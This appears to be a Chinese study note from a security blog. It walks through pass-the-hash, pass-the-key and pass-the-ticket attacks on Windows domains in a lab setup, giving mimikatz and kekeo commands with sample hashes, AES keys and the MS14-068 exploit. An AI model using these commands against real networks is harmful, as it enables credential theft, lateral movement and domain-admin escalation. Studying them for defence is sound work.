【学习笔记】内网安全4-NTLM认证禁用对策

概念

PTH(pass the hash) 利用lm或ntlm的值进行渗透测试
PTT(pass the ticket) 利用的票据凭证TGT进行的渗透测试
PTK(pas the key) 利用ekeys、aes256进行的渗透测试

分析

#PTH在内网渗透中是一种经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不是提供明文面

#PTK:如果禁用了NTLM认证,PsExec无法利用获得的NTLM Hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win7/2008r2/8/2012等,可以使用AES keys代替NT Hash来实现ptk攻击。

#PTT攻击的部分就不是简单的NTLM认证了,他是利用Kerberos协议进行攻击的,这里面就介绍三周常见的攻击手法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。
MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域中任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780

PTH传递&PTK传递

未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

域横向移动PTK传递-mimikatz
PTK aes256传递
打补丁后的工作组及域连接:(必须打补丁 不然用不了)
sekurlsa::ekeys #获取aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

总结:KB2871997补丁后的影响
pth:没打补丁用户都可以连接,打了补丁只能administrator连接
ptk:打了补丁才能用户都可以连接,采用aes256连接

PTT传递-MS14-068

1.查看SID
whoami /user
2.打开mimikatz、利用SID(ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码)
.\mimikatz.exe
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d
3.自动生成TGT_mary@god.org.ccache文件后,查看当前票据,删除票据
exit
klist
klist purge
4.用mimikatz导入刚刚生成的票据
.\mimikatz.exe
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
5.klist查看成功导入后,用dir连接(用计算机名)
exit
klist
net time /domain 获取计算机名
dir \0WA2010CN-God.god.org\c$
6.验证:删除票据,再连接、错误
klist purge
dir \0WA2010CN-God.god.org\c$

第二种利用工具kekeo
1.生成票据
.\kekeo “tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c”
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看票据
klist
4.利用dir连接(用计算机名)
dir \0WA2010CN-God.god.org\c$

第三种利用本地票据(需管理权限)(需要计算机连接过域控,存活时间十小时)
把十小时之内计算机连接过的票据导出
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi
(类似cookie欺骗)

上一篇:linux下memcached的安装


下一篇:守护线程